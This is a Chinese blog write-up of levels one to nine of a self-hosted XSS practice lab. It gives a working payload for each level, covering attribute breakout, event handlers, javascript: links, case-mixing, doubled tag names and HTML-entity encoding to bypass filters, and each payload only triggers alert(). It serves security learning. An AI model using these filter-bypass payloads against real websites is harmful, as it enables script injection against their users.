自建靶场 XSS练习(一)

自建靶场 XSS练习(一)

点击链接快速跳到指定关卡


靶场搭建

我用的是phpStudy,靶场代码可以去github上找,或者私信问我要
浏览器用的火狐,有hackbar插件,谁用谁知道

在这里插入图片描述


一、第一关

在这里插入图片描述
点击进入第一关
在这里插入图片描述
这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩点更花哨的也没人拦着你。
在这里插入图片描述

二、第二关

<script>alert(/xss/)</script>试一下在这里插入图片描述
发现value属性没有加过滤,那就直接闭合标签,用这个"><script>alert(/xss/)</script>//,过在这里插入图片描述

三、第三关

还是老样子,<script>alert(/xss/)</script>试一下,发现<和>被转义了在这里插入图片描述
尝试构造event触发XSS,代码' onmousemove='javascript:alert(/xss/)在这里插入图片描述
鼠标在搜索框里移动一下,过在这里插入图片描述
当然也可用别的event,比如onclick

四、第四关

再用<script>alert(/xss/)</script>试一下在这里插入图片描述
等一下,我尖括号呢?

用和上一关一样的POC,"onmousemove="javascript:alert(/xss/),因为没尖括号,随便你过滤,注意把单引号换成双引号在这里插入图片描述

五、第五关

还是<script>alert(/xss/)</script>试一下在这里插入图片描述

发现scripton被过滤,尝试大小写,不行,但是尖括号没被过滤,灵鸡一动,构造新标签,利用href触发XSS,poc"> <a href='javascript:alert(/xss/)'>,点击过关在这里插入图片描述

六、第六关

发现href script on都被过滤在这里插入图片描述
尝试大小写,POC"><ScRiPt>alert(/xss/)</ScRIpT>,触发XSS,通过在这里插入图片描述

七、第七关

<script>alert(/xss/)</script>试一下,script被过滤,不见了在这里插入图片描述
复写,构造POC,"> <scrscriptipt>alert(/xss/)</scrscriptipt>//,过滤中间script外层组成代码触发XSS在这里插入图片描述

七、第八关

又双叒叕<script>alert(/xss/)</script>试一下,上面<和"被过滤,下面script被过滤在这里插入图片描述

尝试大小也不行,复写也不行,最后用hackbar里面的html编码在这里插入图片描述
POC:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;在这里插入图片描述

九、第九关

查看源码,需要合法链接才能构造XSS在这里插入图片描述
他要就给他随便写一个,POCjavascript:alert(/xss/)//http://www.baidu.com,发现被过滤,不行在这里插入图片描述
大小写不行,尝试编码,t编码&#116;,POC:javascrip&#116;:alert(/xss/)//http://www.baidu.com,点击链接触发XSS在这里插入图片描述

今天先写到这,过两天把剩下的关卡写完

晚安

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值